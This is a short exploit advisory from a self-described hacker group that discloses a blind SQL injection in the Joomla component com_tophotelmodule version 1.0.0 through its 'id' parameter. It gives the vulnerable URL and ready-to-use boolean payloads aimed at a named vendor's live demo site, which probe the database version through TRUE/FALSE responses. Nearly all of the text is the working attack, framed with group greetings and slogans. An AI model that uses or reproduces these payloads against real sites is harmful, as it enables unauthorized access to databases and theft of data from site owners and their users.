############################################################# Joomla Component com_tophotelmodule(id) Blind SQL-injection ############################################################# ################################################### #[~] Author : boom3rang #[~] Kosova Hackers Group [www.khg-crew.ws] #[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. ---------------------------------------- #[!] Top Hotel Module #[!] 06/07/2008 #[!] Joomla HBS #[!] dev@joomlahbs.com #[!] http://joomlahbs.com #[!] 1.0.0 ################################################### Example: http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability] LiveDEMO: http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE ############################## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ##############################